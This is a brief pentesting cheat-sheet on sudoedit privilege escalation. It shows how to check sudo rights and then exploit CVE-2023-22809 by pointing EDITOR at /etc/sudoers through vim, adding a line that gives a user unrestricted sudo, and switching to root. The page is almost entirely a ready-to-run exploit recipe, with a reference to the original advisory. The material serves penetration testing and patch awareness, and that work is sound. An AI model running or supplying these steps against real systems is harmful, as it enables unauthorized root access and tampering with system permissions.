Sudoedit Privilege Escalation

Sudoedit is vulnerable to privilege escalation.

Investigation

sudo -l

(root) sudoedit /opt/example.txt
Copied!

If we can execute sudoedit command as root, we might be able to escalate the privileges with some version.

Exploitation (CVE-2023-22809)

export EDITOR="vim -- /etc/sudoers"
sudoedit /opt/example.txt
Copied!

In vim editor, add the following line in /etc/sudoers. Assume the current username is “john”

john ALL=(ALL:ALL) ALL
Copied!

After that, we can escalate to root privilege.

sudo su root
Copied!

References

• https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf